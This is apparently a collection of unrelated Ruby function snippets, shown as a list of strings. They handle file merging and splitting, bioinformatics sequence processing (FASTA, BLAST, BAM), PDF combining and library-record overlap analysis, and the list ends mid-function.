"def sort_multiple(output, files, key)\n output_file = \"#{output}.sorted\"\n @headers = []\n @content = []\n files.each do |file|\n @content_as_table = parse(file)\n @headers = @content_as_table.headers if @headers.empty?\n @index_of_key = @headers.index(key)\n @content += @content_as_table.to_a.drop(1)\n end\n @content = @content.sort_by { |a| -a[@index_of_key].to_i }\n write(@content, @headers, output_file)\n output_file\n end",
"def mergeGbkSeq\n \nend",
"def merge_table_files\n merged_table_file = intermediate(\"Workbook tables\")\n worksheets do |name,xml_filename|\n log.info \"Merging table files for #{name}\"\n worksheet_table_file = input([name, \"Worksheet tables\"])\n worksheet_table_file.each_line do |line|\n merged_table_file.puts line\n end\n close worksheet_table_file\n end\n close merged_table_file\n end",
"def union(b)\n b.each do |bf|\n af = @cfile_by_name[bf.file]\n if af\n af.union bf\n else\n @cfile_by_name[bf.file] = bf\n end\n end\n self\n end",
"def merge_records(merger, output)\n contents = []\n flag = true\n while flag\n begin\n record = merger.next\n headers = record.keys if headers.nil?\n contents << record\n rescue StopIteration\n flag = false\n break\n end\n end\n file_name = output.gsub('.txt', '')\n output_file = file_name + '.txt.audited'\n write(contents, headers, output_file)\n end",
"def merge(into_file)\n raise Error::Argument, \"No files to merge\" if self.to_a.empty?\n if self.count > 1\n Utility.system_quietly('mp3wrap', into_file, *self.to_a)\n written = File.join(into_file.dir, \"#{File.basename(into_file.path, '.*') }_MP3WRAP.mp3\")\n FileUtils.mv(written, into_file)\n else\n FileUtils.cp(self.first, into_file)\n end\n self.file(into_file.path)\n end",
"def merge(*files)\n @paths[''].merge *files\n end",
"def genenate_average_files\n puts 'genenate_average_files'\n @data.each do |e|\n final = get_avg(e)\n puts \"#{e[0]} #{final}\"\n File.open(e[0].to_s, 'w') do |file|\n file.puts(\"#{e[0]}, #{final}\")\n end\n end\n end",
"def merge(*args)\n options = Hash === args.last ? args.pop : {}\n files = to_artifacts(args)\n rake_check_options options, :path\n raise ArgumentError, \"Expected at least one file to merge\" if files.empty?\n path = options[:path] || @path\n expanders = files.collect do |file|\n @sources << proc { file.to_s }\n expander = ZipExpander.new(file)\n @actions << proc do |file_map, transform_map|\n file.invoke() if file.is_a?(Rake::Task)\n expander.expand(file_map, transform_map, path)\n end\n expander\n end\n Merge.new(expanders)\n end",
"def by_file(first, output)\n qseq = Bio::Ngs::Converter::Qseq.new(options.paired ? :pe : :se)\n buffers = [first] if first.kind_of? String\n buffers = first if first.kind_of? Array\n buffers.each do |file_name|\n qseq.buffer = File.open(file_name,'r') #todo: dir is not used here it could be a bug\n fastq_file = File.open(File.join(options.dir,\"#{output}.fastq\"), (options.append ? 'a' : 'w'))\n qseq.to_fastq do |fastq|\n fastq_file.puts fastq if fastq\n end\n qseq.buffer.close\n fastq_file.close \n #Write the report\n File.open(File.join(options.dir,\"#{output}.stats\"), (options.append ? 'a' : 'w')) do |file|\n file.puts ({:file_name=>file_name, :stats=>qseq.stats}.to_yaml)\n end\n end #buffers\n # puts \"Done #{file_name}\"\n end",
"def mp3wrap_merge(mp3s, output_file_name, path)\n mp3wrap_path = `which mp3wrap`.chomp\n\n `#{ mp3wrap_path } #{ path }#{ output_file_name } #{ mp3s }`\nend",
"def process\n outs = []\n @infiles.each do |f|\n if f.instance_of? Hash\n dat = f[:block].(f[:file])\n if dat.instance_of? String\n out << dat + \"\\n\\n\"\n else\n fail TypeError, \"#{dat.class} returned, String expected\"\n end\n elsif f.instance_of? String\n outs << File.read(f)\n elsif f.instance_of? Array\n outs << f.map { |fn| File.read(fn) }\n else\n fail TypeError, \"Infile #{f.inspect} is not a hash nor a string nor an array!\"\n end\n end\n out = outs.join(\"\\n\\n\")\n if @block\n out = @block.(out)\n end\n if @outfile\n File.delete(@outfile) if File.exist? @outfile\n File.open(@outfile, 'w') do |f|\n f.write(out)\n end\n end\n out\n end",
"def command_to_merge_files(tool, input)\n p \"#{ tool } #{ input }\"\nend",
"def merge_names(*args)\n\tnames = {}\n\targs.each do |arg|\n\t\tFile.open(arg,'r') do |f|\n\t\t\twhile line = f.gets do\n\t\t\t\tnames[line.delane_sequence_name] = true\n\t\t\tend\n\t\tend\n\tend\n\tnames\nend",
"def split_input filename, pieces\n input = {}\n name = nil\n seq=\"\"\n sequences=0\n output_files=[]\n if pieces > 1\n File.open(filename).each_line do |line|\n if line =~ /^>(.*)$/\n sequences+=1\n if name\n input[name]=seq\n seq=\"\"\n end\n name = $1\n else\n seq << line.chomp\n end\n end\n input[name]=seq\n # construct list of output file handles\n outputs=[]\n pieces = [pieces, sequences].min\n pieces.times do |n|\n outfile = \"#{filename}_chunk_#{n}.fasta\"\n outfile = File.expand_path(outfile)\n outputs[n] = File.open(\"#{outfile}\", \"w\")\n output_files[n] = \"#{outfile}\"\n end\n # write sequences\n count=0\n input.each_pair do |name, seq|\n outputs[count].write(\">#{name}\\n\")\n outputs[count].write(\"#{seq}\\n\")\n count += 1\n count %= pieces\n end\n outputs.each do |out|\n out.close\n end\n else\n output_files << filename\n end\n output_files\n end",
"def concatinate(f1, f2)\n\t\tDir.foreach(\"#{f1}\") do |x0|\n\t\t\tnext if x0 == '.' or x0 == '..' or x0.start_with?('.')\n\t\t\tDir.foreach(\"#{f2}\") do |x1|\n\t\t\t\tnext if x1 == '.' or x1 == '..' or x1.start_with?('.')\n\t\t\t\t\n\t\t\t\t# concatenate x and y \t\t\n \t\t\t\tsystem(\"cat #{f1}/#{x0} #{f2}/#{x1} > t1/#{x0}#{x1}\")\n\t\t\t\t# compress concatenated files\n \t\t\t\tsystem(\"7za a -t7z t2/#{x0}#{x1}.7z t1/#{x0}#{x1}\")\n \t \t\t#system(\"7za a -t7z -mx9 -mmt2 -ms4g -m0=lzma:d128m:fb256 t2/#{x0}#{x1}.7z t1/#{x0}#{x1}kd\")\n \t \t\t\n \t \tend \n \t end\t\t\n\tend",
"def merge_files(files, to, &blk)\n File.moves_to_merge(files, to).each do |move|\n continue = true\n continue = yield(move) if block_given?\n break unless continue\n mv_p move[:from], move[:to]\n end\n end",
"def find_blat_out_candidate_reads\n\t\tputs \"step 4 find blat out candidate reads\"\n\t\tblat_out_candidate_reads(\n\t\t\tfiles.keys.sort.collect{|k| \"chopped_#{k}lane.psl \" },\n\t\t\tfiles.keys.sort.collect{|k| \"#{k}lane.fa \" },\n\t\t\tfiles.keys.sort.collect{|k| \"04_blat_out_candidate_#{k}lane.fa\" })\n\n#\t\tcommand = \"blatoutcandidate.rb \"\n#\t\t#\tfiles is a hash and the keys are not guaranteed to be sorted\n#\t\t#\tsort alphabetically and left is first, right is last (conveniently)\n#\t\tfiles.keys.sort.each{|k| command << \"chopped_#{k}lane.psl \" } #\tNON-HUMAN matches\n#\t\tfiles.keys.sort.each{|k| command << \"#{k}lane.fa \" } #\traw reads input\n#\t\tcommand.execute\n##\n##\tblatoutcandidate.pl ALWAYS creates ... blat_out_candidate_#{k}lane.fa\n##\tI REALLY don't like that. So much inconsistancy. Will overwrite existing.\n##\n##\tTODO wrote my own version of blatoutcandidate so could change this\n##\n#\t\tfiles.each_pair { |k,v| \n#\t\t\t#\t\n#\t\t\t#\traw reads with names in the psl files.\n#\t\t\t#\t\n#\t\t\t\"blat_out_candidate_#{k}lane.fa\".file_check(die_on_failed_file_check)\n#\t\t\tFileUtils.mv( \"blat_out_candidate_#{k}lane.fa\",\n#\t\t\t\t\"04_blat_out_candidate_#{k}lane.fa\" )\t#\tNON-HUMAN matches \n#\t\t}\n\tend",
"def split_refseq\n # prepare output files\n system(%Q[cut -f4 #{$prepare_dir}/refseq_genes_result.tsv | cut -c1-5 | sort | uniq > #{$prepare_dir}/refp_prefix_list.txt ]) # get exist prefix list of protein_id\n FileUtils.mkdir_p(\"#{$prepare_dir}/refp\") unless File.exist?(\"#{$prepare_dir}/refp\")\n refp_output = {}\n File.open(\"#{$prepare_dir}/refp_prefix_list.txt\") do |f|\n f.each_line do |line|\n prefix = line.chomp.strip\n refp_output[prefix] = File.open(\"#{$prepare_dir}/refp/#{prefix}.dat\", \"w\")\n end\n end\n refp_output[\"no_protein_id\"] = File.open(\"#{$prepare_dir}/refp/no_protein_id.dat\", \"w\") # protein_id is optional\n\n File.open(\"#{$prepare_dir}/refseq_genes_result.tsv\") do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n prefix = (columns[3].nil? || columns[3] == \"\") ? \"no_protein_id\" : columns[3][0..4] # protein_id is optional\n refp_output[prefix].puts line.chomp.strip\n end\n end\n refp_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def combine_salmon\n @tpm = {}\n @counts = {}\n if @paired == 1\n @data.each_with_index do |left,i|\n name = \"#{left[:name]}-#{left[:type]}-#{left[:rep]}\"\n File.open(left[:salmon]).each do |line|\n unless line.start_with?(\"#\")\n cols = line.chomp.split(\"\\t\")\n transcript = cols[0]\n tpm = cols[2].to_f\n counts = cols[3].to_f\n @tpm[transcript] ||= {}\n @tpm[transcript][name] = tpm\n @counts[transcript] ||= {}\n @counts[transcript][name] = counts\n end\n end\n end\n elsif @paired == 2\n @data.each_with_index.each_slice(2) do |(left,i), (right,j)|\n name = \"#{left[:name]}-#{left[:type]}-#{left[:rep]}\"\n File.open(left[:salmon]).each do |line|\n unless line.start_with?(\"#\")\n cols = line.chomp.split(\"\\t\")\n transcript = cols[0]\n tpm = cols[2].to_f\n counts = cols[3].to_f\n @tpm[transcript] ||= {}\n @tpm[transcript][name] = tpm\n @counts[transcript] ||= {}\n @counts[transcript][name] = counts\n end\n end\n end\n end\n File.open(\"#{@output_dir}/combined_tpm.csv\", \"wb\") do |out|\n out.write \"transcript\"\n @tpm[@tpm.keys.first].each do |file, tpm|\n out.write \"\\t#{file}\"\n end\n out.write \"\\n\"\n @tpm.each do |transcript, hash|\n out.write \"#{transcript}\"\n hash.each do |file, tpm|\n out.write \"\\t#{tpm}\"\n end\n out.write \"\\n\"\n end\n end\n File.open(\"#{@output_dir}/combined_counts.csv\", \"wb\") do |out|\n out.write \"transcript\"\n @counts[@counts.keys.first].each do |file, counts|\n out.write \"\\t#{file}\"\n end\n out.write \"\\n\"\n @counts.each do |transcript, hash|\n out.write \"#{transcript}\"\n hash.each do |file, counts|\n out.write \"\\t#{counts}\"\n end\n out.write \"\\n\"\n end\n end\n end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped reads into fastq-format.\"\t\n\tend",
"def group_files file_data, output_path, options = {:prefix => \"L\", :suffix => \".fastq.gz\", :exclude_undetermined => true}\n\t\t\t\t# alternatively inherit the parent class and call super???? \n\t\t\t\t# super \n\t\t\t\t# \t\n groups = {}\n file_data.each do |data|\n if data[:barcode] == \"Undetermined\" and options[:exclude_undetermined]\n log \"# Undetermined sample lane: #{data[:lane]} - name: #{data[:sample_name]}. Skipping\"\n next\n end\n \n group_key = name_for_data data, options\n \n if groups.include? group_key\n if groups[group_key][:sample_name] != data[:sample_name]\n raise \"ERROR: sample names not matching #{group_key} - #{data[:path]}:#{data[:sample_name]}vs#{groups[group_key][:sample_name]}\"\n end\n if groups[group_key][:lane] != data[:lane]\n raise \"ERROR: lanes not matching #{group_key} - #{data[:path]}\"\n end\n groups[group_key][:files] << data\n else\n group_path = File.join(output_path, group_key)\n groups[group_key] = {:group_name => group_key,\n :path => group_path,\n :sample_name => data[:sample_name],\n :read => data[:read],\n :lane => data[:lane],\n :files => [data]\n }\n end\n end\n \n # sort based on read set\n groups.each do |key, group|\n group[:files] = group[:files].sort {|x,y| x[:set] <=> y[:set]}\n group[:paths] = group[:files].collect {|data| data[:path]}\n end\n groups.values\n end",
"def merge_gap_mark_tagging_import_into_content_at(options)\n gap_mark_tagging_import_base_dir = config.compute_base_dir(\n options['base-dir'] || options['base-dir-1'] || :gap_mark_tagging_import_dir\n )\n gap_mark_tagging_import_glob_pattern = config.compute_glob_pattern(\n gap_mark_tagging_import_base_dir,\n options['file-selector'] || :all_files,\n options['file-extension'] || :txt_extension\n )\n content_base_dir = config.compute_base_dir(\n options['base-dir-2'] || :content_dir\n )\n\n $stderr.puts ''\n $stderr.puts '-' * 80\n $stderr.puts 'Merging :gap_mark tokens from gap_mark_tagging_import into content_at'\n start_time = Time.now\n total_count = 0\n success_count = 0\n errors_count = 0\n\n Dir.glob(gap_mark_tagging_import_glob_pattern).each do |gap_mark_tagging_import_file_name|\n if gap_mark_tagging_import_file_name !~ /\\.gap_mark_tagging\\.txt\\z/\n next\n end\n\n total_count += 1\n # prepare paths\n content_at_file_name = gap_mark_tagging_import_file_name.gsub(\n gap_mark_tagging_import_base_dir, content_base_dir\n ).gsub(\n /\\.gap_mark_tagging\\.txt\\z/, '.at'\n )\n output_file_name = content_at_file_name\n\n begin\n outcome = Repositext::Process::Merge::GapMarkTaggingImportIntoContentAt.merge(\n File.read(gap_mark_tagging_import_file_name),\n File.read(content_at_file_name),\n )\n\n if outcome.success\n # write to file\n at_with_merged_tokens = outcome.result\n FileUtils.mkdir_p(File.dirname(output_file_name))\n File.write(output_file_name, at_with_merged_tokens)\n success_count += 1\n $stderr.puts \" + Merge :gap_marks from #{ gap_mark_tagging_import_file_name }\"\n else\n errors_count += 1\n $stderr.puts \" x Error: #{ gap_mark_tagging_import_file_name }: #{ outcome.messages.join }\"\n end\n rescue StandardError => e\n errors_count += 1\n $stderr.puts \" x Error: #{ gap_mark_tagging_import_file_name }: #{ e.class.name } - #{ e.message } - #{ e.backtrace.join(\"\\n\") }\"\n end\n end\n\n $stderr.puts \"Finished merging #{ success_count } of #{ total_count } files in #{ Time.now - start_time } seconds.\"\n $stderr.puts '-' * 80\n end",
"def alignment_strings(start=0,stop=self.length,organisms=nil) \n answer = Array.new \n self.genomic_aligns.each do |contig|\n if organisms.nil? # if no organisms were specified to limit the results\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name)) unless sequence.nil?\n else\n if organisms.include?(contig.find_organism)\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name))\n end\n end \n end\n return answer \n end",
"def process_input_seqs! fnames\n seq_lengths = {}\n clean_fnames = []\n\n fnames.each do |fname|\n clean_fname = fname + \"_aai_clean\"\n clean_fnames << clean_fname\n File.open(clean_fname, \"w\") do |f|\n Object::ParseFasta::SeqFile.open(fname).each_record do |rec|\n unless bad_seq? rec.seq\n header =\n annotate_header clean_header(rec.header),\n File.basename(fname)\n\n seq_lengths[header] = rec.seq.length\n\n f.puts \">#{header}\\n#{rec.seq}\"\n end\n end\n end\n end\n\n [seq_lengths, clean_fnames]\n end",
"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
"def split_input filename, pieces\n input = {}\n name = nil\n seq=\"\"\n sequences=0\n File.open(filename).each_line do |line|\n if line =~ /^>(.*)$/\n sequences+=1\n if name\n input[name]=seq\n seq=\"\"\n end\n name = $1\n else\n seq << line.chomp\n end\n end\n input[name]=seq\n # construct list of output file handles\n outputs=[]\n output_files=[]\n pieces = [pieces, sequences].min\n pieces.times do |n|\n outfile = File.basename(\"#{filename}_chunk_#{n}.fasta\")\n outfile = \"#{@working_dir}/#{outfile}\"\n outputs[n] = File.open(\"#{outfile}\", \"w\")\n output_files[n] = \"#{outfile}\"\n end\n # write sequences\n count=0\n input.each_pair do |name, seq|\n outputs[count].write(\">#{name}\\n\")\n outputs[count].write(\"#{seq}\\n\")\n count += 1\n count %= pieces\n end\n outputs.each do |out|\n out.close\n end\n output_files\n end",
"def fix_adjust_merged_record_mark_positions(options)\n input_file_spec = options['input'] || 'staging_dir/at_files'\n Repositext::Cli::Utils.change_files_in_place(\n config.compute_glob_pattern(input_file_spec),\n /\\.at\\z/i,\n \"Adjusting merged :record_mark positions\",\n options\n ) do |contents, filename|\n outcome = Repositext::Fix::AdjustMergedRecordMarkPositions.fix(contents, filename)\n [outcome]\n end\n end",
"def merge!(*args)\n val = args.pop\n keys = args.flatten\n StorageFile.merge!(path, [*@parents, *keys], val)\n end",
"def create_final_contract(address, final_contract, files_to_load, table_of_contents)\n files_to_load.unshift(\"table_of_contents.pdf\")\n files_to_load.each do |file|\n\n final_contract << CombinePDF.load(file)\n end\n\n final_contract.save \"#{address}_final_contract.pdf\"\nend",
"def zipSequenceFiles()\n puts \"Zipping sequence files\"\n zipCmd = \"bzip2 *sequence.txt\"\n `#{zipCmd}`\n end",
"def zipSequenceFiles()\n puts \"Zipping sequence files\"\n zipCmd = \"bzip2 *sequence.txt\"\n `#{zipCmd}`\n end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped.bam into fastq-format.\"\t\n\tend",
"def seed_extension(input_hash, anchor_length, read_length, fasta, output_file, mm = 1, max_overhang = read_length + 8)\n\n\t\toutput_hash = {}\n\t\n\t\tinput_hash.each do |chr_a, chromosomes|\n\t\t\t# Load reference\n\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\theader = fasta_file.gets.strip\n\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\tchromosomes.each do |chr_b, anchorpairs|\n\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n \t\t\theader = fasta_file.gets.strip\n \t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t# Loop through hash to extend seeds for each pair\n\t\t\t\tanchorpairs.each do |pair|\n\t\t\t\t\tupstream, downstream = pair\n\t\t\t\t\tqname, mate, read = upstream.id.split('_')[0..2]\n\n\t\t\t\t\tupstream.strand == 1 ? upstream_read = read : upstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\tdownstream.strand == 1 ? downstream_read = read : downstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\t\n\t\t\t\t\tup = dna_a[upstream.start - read_length + anchor_length..upstream.start + anchor_length - 1].upcase\n\t\t\t\t\tdown = dna_b[downstream.start..downstream.start + read_length - 1].upcase\t\n\t\t\t\t\n\t\t\t\t\tif upstream.strand == downstream.strand\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\n\t\t\t\t\telsif upstream.strand == 1 && downstream.strand == -1\n\t\t\t\t\t\tdown = dna_b[downstream.start - read_length + anchor_length..downstream.start + anchor_length - 1].upcase\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.upstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start - downstream_alignmentlength + anchor_length\t\n\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\tup = dna_a[upstream.start..upstream.start + read_length - 1].upcase\t\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.downstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start + upstream_alignmentlength - 1\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\t\t\t\t\tend\n\n\t\t\t\t\ttotal_alignmentlength = upstream_alignmentlength + downstream_alignmentlength\n\n\t\t\t\t\tif total_alignmentlength >= read_length && total_alignmentlength <= max_overhang\n\t\t\t\t\t\toverhang = total_alignmentlength - read_length\n\t\n\t\t\t\t\t\tqname = qname.to_sym\n\t\t\t\t\t\tsummary = [chr_a, upstream_breakpoint, upstream.strand, chr_b, downstream_breakpoint, downstream.strand, total_alignmentlength, mate] \n\t\t\t\t\t\t# Candidates for which both, R1 and R2, are present are deleted\n\t\t\t\t\t\t# One read can neither fall on two different non-canonical nor the same junction\n\t\t\t\t\t\tif !output_hash.has_key?(qname)\n\t\t\t\t\t\t\toutput_hash[qname] = summary\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\toutput_hash.delete(qname)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput_hash.each do |qname, v| \n\t\t\t\toutput.puts [\"#{qname.to_s}/#{v[-1]}\", v[0..-2]].join(\"\\t\") if (v[2] - v[1]).abs >= read_length\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Seed extension succeded.\"\n\tend",
"def run_blast_with_splitting evalue, threads, bin1, bin2\n # puts \"running blast by splitting input into #{threads} pieces\"\n if !File.exist?(@output1)\n blasts=[]\n files = split_input(@query, threads)\n threads = [threads, files.length].min\n files.threach(threads) do |thread|\n cmd1 = \"#{bin1} -query #{thread} -db #{@working_dir}/#{@target_name} \"\n cmd1 << \" -out #{thread}.blast -evalue #{evalue} \"\n cmd1 << \" -outfmt \\\"6 std qlen slen\\\" \"\n if bin1=~/blastn/\n cmd1 << \" -dust no \"\n elsif bin1=~/blastx/ or bin1=~/blastp/ or bin1=~/tblastn/\n cmd1 << \" -seg no \"\n end\n cmd1 << \" -soft_masking false \"\n cmd1 << \" -max_target_seqs 50 \"\n cmd1 << \" -num_threads 1\"\n if !File.exists?(\"#{thread}.blast\")\n blast1 = Cmd.new(cmd1)\n blast1.run\n if !blast1.status.success?\n raise RuntimeError.new(\"BLAST Error:\\n#{blast1.stderr}\")\n end\n end\n blasts << \"#{thread}.blast\"\n end\n cat_cmd = \"cat \"\n cat_cmd << blasts.join(\" \")\n cat_cmd << \" > #{@output1}\"\n catting = Cmd.new(cat_cmd)\n catting.run\n if !catting.status.success?\n raise RuntimeError.new(\"Problem catting files:\\n#{catting.stderr}\")\n end\n files.each do |file|\n File.delete(file) if File.exist?(file)\n end\n blasts.each do |b|\n File.delete(b) # delete intermediate blast output files\n end\n end\n\n if !File.exist?(@output2)\n blasts=[]\n files = split_input(@target, threads)\n threads = [threads, files.length].min\n files.threach(threads) do |thread|\n cmd2 = \"#{bin2} -query #{thread} -db #{@working_dir}/#{@query_name} \"\n cmd2 << \" -out #{thread}.blast -evalue #{evalue} \"\n cmd2 << \" -outfmt \\\"6 std qlen slen\\\" \"\n cmd2 << \" -max_target_seqs 50 \"\n cmd2 << \" -num_threads 1\"\n if !File.exists?(\"#{thread}.blast\")\n blast2 = Cmd.new(cmd2)\n blast2.run\n if !blast2.status.success?\n raise RuntimeError.new(\"BLAST Error:\\n#{blast2.stderr}\")\n end\n end\n blasts << \"#{thread}.blast\"\n end\n cat_cmd = \"cat \"\n cat_cmd << blasts.join(\" \")\n cat_cmd << \" > #{@output2}\"\n catting = Cmd.new(cat_cmd)\n catting.run\n if !catting.status.success?\n raise RuntimeError.new(\"Problem catting files:\\n#{catting.stderr}\")\n end\n files.each do |file|\n File.delete(file) if File.exist?(file)\n end\n blasts.each do |b|\n File.delete(b) # delete intermediate blast output files\n end\n end\n\n end",
"def overlap_analysis_for_bibs(bib_ids:, path:)\n # Get overlap info for source bib IDs and all others\n source_overlap_info = {}\n other_overlap_info = {}\n Dir.glob(\"#{path}/*.mrc\").each do |file|\n reader = MARC::Reader.new(file)\n reader.each do |record|\n id = record['001'].value.to_i\n overlap_info = get_overlap_info_from_record(record)\n overlap_info.delete(:id)\n oclc_910b = []\n record.fields('910').each do |field|\n vals = get_oclc_from_field(field, 'b')\n oclc_910b += vals\n end\n overlap_info[:std_nos][:oclc] += oclc_910b\n if bib_ids.include?(id)\n source_overlap_info[id] = overlap_info\n else\n other_overlap_info[id] = overlap_info\n end\n end\n end\n\n # Get overlap of identifiers\n source_lccn = source_overlap_info.values.map { |info| info[:std_nos][:lccn] }\n source_lccn.flatten!\n source_lccn.uniq!\n other_lccn = other_overlap_info.values.map { |info| info[:std_nos][:lccn] }\n other_lccn.flatten!\n other_lccn.uniq!\n overlap_lccn = source_lccn & other_lccn\n\n source_isbn = source_overlap_info.values.map { |info| info[:std_nos][:isbn] }\n source_isbn.flatten!\n source_isbn.uniq!\n other_isbn = other_overlap_info.values.map { |info| info[:std_nos][:isbn] }\n other_isbn.flatten!\n other_isbn.uniq!\n overlap_isbn = source_isbn & other_isbn\n\n source_issn = source_overlap_info.values.map { |info| info[:std_nos][:issn] }\n source_issn.flatten!\n source_issn.uniq!\n other_issn = other_overlap_info.values.map { |info| info[:std_nos][:issn] }\n other_issn.flatten!\n other_issn.uniq!\n overlap_issn = source_issn & other_issn\n\n source_oclc = source_overlap_info.values.map { |info| info[:std_nos][:oclc] }\n source_oclc.flatten!\n source_oclc.uniq!\n other_oclc = other_overlap_info.values.map { |info| info[:std_nos][:oclc] }\n other_oclc.flatten!\n other_oclc.uniq!\n overlap_oclc = source_oclc & other_oclc\n\n source_title = source_overlap_info.values.map { |info| info[:title_brief] }\n source_title.uniq!\n other_title = other_overlap_info.values.map { |info| info[:title_brief] }\n other_title.uniq!\n overlap_title = source_title & other_title\n\n # Get source records where two identifiers match\n # the overlapping standard numbers\n source_lccn_isbn_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:lccn] &&\n !(info[:std_nos][:lccn] & overlap_lccn).empty? &&\n info[:std_nos][:isbn] &&\n !(info[:std_nos][:isbn] & overlap_isbn).empty?\n end\n\n source_lccn_issn_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:lccn] &&\n !(info[:std_nos][:lccn] & overlap_lccn).empty? &&\n info[:std_nos][:issn] &&\n !(info[:std_nos][:issn] & overlap_issn).empty?\n end\n\n source_lccn_oclc_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:lccn] &&\n !(info[:std_nos][:lccn] & overlap_lccn).empty? &&\n info[:std_nos][:oclc] &&\n !(info[:std_nos][:oclc] & overlap_oclc).empty?\n end\n\n source_lccn_title_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:lccn] &&\n !(info[:std_nos][:lccn] & overlap_lccn).empty? &&\n overlap_title.include?(info[:title_brief])\n end\n\n source_isbn_issn_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:isbn] &&\n !(info[:std_nos][:isbn] & overlap_isbn).empty? &&\n info[:std_nos][:issn] &&\n !(info[:std_nos][:issn] & overlap_issn).empty?\n end\n\n source_isbn_oclc_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:isbn] &&\n !(info[:std_nos][:isbn] & overlap_isbn).empty? &&\n info[:std_nos][:oclc] &&\n !(info[:std_nos][:oclc] & overlap_oclc).empty?\n end\n\n source_isbn_title_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:isbn] &&\n !(info[:std_nos][:isbn] & overlap_isbn).empty? &&\n overlap_title.include?(info[:title_brief])\n end\n\n source_issn_oclc_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:issn] &&\n !(info[:std_nos][:issn] & overlap_issn).empty? &&\n info[:std_nos][:oclc] &&\n !(info[:std_nos][:oclc] & overlap_oclc).empty?\n end\n\n source_issn_title_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:issn] &&\n !(info[:std_nos][:issn] & overlap_issn).empty? &&\n overlap_title.include?(info[:title_brief])\n end\n\n source_oclc_title_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:oclc] &&\n !(info[:std_nos][:oclc] & overlap_oclc).empty? &&\n overlap_title.include?(info[:norm_title])\n end\n\n # Create a hash with source bib IDs as the keys and\n # matching other bibs as the values\n source_to_other = {}\n source_lccn_isbn_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:lccn] & info[:std_nos][:lccn]).empty? &&\n !(match_info[:std_nos][:isbn] & info[:std_nos][:isbn]).empty?\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_lccn_issn_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:lccn] & info[:std_nos][:lccn]).empty? &&\n !(match_info[:std_nos][:issn] & info[:std_nos][:issn]).empty?\n end\n unless 